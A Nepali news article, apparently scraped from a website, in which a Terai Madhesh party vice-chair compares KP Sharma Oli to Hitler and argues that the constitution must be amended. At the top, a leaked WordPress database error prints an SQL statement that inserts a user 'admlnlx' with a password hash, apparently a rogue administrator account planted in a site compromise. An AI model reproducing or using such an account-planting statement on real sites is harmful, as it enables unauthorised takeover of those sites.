WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BU7tbQVOMihnndwdXtkgUn/9SgEbaG0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 21:18:45', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागुन ६ –
तराई मधेस लोकतान्त्रिक पार्टीका उपाध्यक्ष हृदयश त्रिपाठीले नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीलाई हिटलरसँग तुलना गरेका छन्। राष्ट्रिय प्रजातन्त्र पार्टीको एकता अधिवेशनमा उनले हिटलरको उदाहरण दिँदै ओलीलाई आफूमात्र राष्ट्रवादी हुँ नभन्न आग्रह गरे। आफू मात्र राष्ट्रवादी र अरुलाई राष्ट्रघाती देख्दा हिटलर सिद्धिनुपरेको भन्दै सचेत रहन आग्रह त्रिपाठीले ओलीलाई आग्रह गरे। ‘इतिहासको कुनै कालखण्डमा जर्मनी शक्तिशाली राष्ट्र थियो। हिटलरले कहिले यहुदीमाथि आक्रमण गरे कहिले विपक्षीमाथि आक्रमण गरे, उनले पनि आफू बाहेक अरुलाई राम्रो देखेनन्।
जर्मनी पनि कमजोर हुँदै गयो हिटलर पनि सिद्धियो’ त्रिपाठीले ओलीलाई भने ‘आफूलाई राष्ट्रवादी र अरुलाई देशद्रोही देख्ने बानी सुधार्नुस्।’ त्रिपाठीले मधेस केन्द्रित दलहरुलाई जातिवादी आरोप लगाएकोमा असहमति राख्दै ओलीलाई ऐना हेर्न आग्रह गरे। ‘आफै मधेसी जनताको उछितो काड्ने अनि हामीलाई जातिवादीको आरोप लगाउने, आफू ऐना हेर्नुस्’ उनले भने। मुलुकमा औलो पीडित थारु र मधेसी समुदायले मिलेर औलो उन्मुलन र सीमा रक्षा गरेको दावी गर्दै अहिले उनीहरुलाई नहेप्न त्रिपाठीले आग्रह गरे। ‘यो मुलुकको रक्षा ताप्लेजुङ पाँचथर र डडेल्धुराकाले गरेका छैनन्’ उनले भने।
त्रिपाठीले संविधान संशोधन नभए अहिलेको संविधान लागू नै नहुने र मुलुक २०४७ सालको अवस्थामा फर्किने चेतावनी दिए। ‘संविधान संशोधन हुँदैन भनेर चर्को कुरा गर्नुभएको छ। संविधान संशोधन भएन भने मुलुक २०४७ सालको स्थितिमा फर्किन्छ’ उनले भने ‘त्यतिबेला पनि संविधान उत्कृष्ट भनिएको थियो, कालान्तरमा अर्को बनाउनुपर्यो।’